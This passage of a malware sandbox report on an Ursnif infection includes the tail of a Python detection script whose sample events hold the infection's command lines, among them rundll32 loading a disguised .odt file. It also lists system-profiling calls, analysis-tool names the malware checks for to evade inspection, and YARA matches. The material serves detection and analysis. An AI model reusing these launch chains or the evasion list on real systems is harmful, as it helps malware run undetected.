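              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'"),
    ProcEvent(4, r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer"),
    # Constructed benign control: an interactive PowerShell started from Explorer.
    ProcEvent(5, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile Get-ChildItem C:\Users\user\Documents"),
]

if __name__ == "__main__":
    for pid, image, rule in scan(SAMPLE_EVENTS):
        print(f"pid={pid} {image}: {rule}")
```

Each of the four malicious events trips at least one rule and the benign control trips none; the mshta and rundll32 events also trip the WMI-parent rule, which is what ties the chain back to wscript.exe's Win32_Process::create call. In real telemetry the rundll32 rule would need an allow-list for legitimate non-.dll modules (for example .cpl files launched by shell32), so treat it as a hunting query rather than a blocking rule.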

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444BDF cpuid 28_2_04444BDF
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 28_2_702E1813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoW,GetLastError,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,___crtGetLocaleInfoW,_isdigit, 28_2_70302100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,GetUserDefaultLangID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 28_2_702FFDD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 28_2_702FC7E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesA, 28_2_70300830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 28_2_702F00B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry, 28_2_70300880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 28_2_702FD120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 28_2_70300110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 28_2_703001D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP,GetLocaleInfoA, 28_2_703009C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen, 28_2_70300AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 28_2_702FD4F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate, 28_2_7030CD00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate, 28_2_7030CD70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 28_2_7030CD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 28_2_70308540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea, 28_2_7030CDC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 28_2_70300610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 28_2_70300690
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 28_2_702E1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444BDF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 28_2_04444BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 28_2_702E1262
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: procexp.exe
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR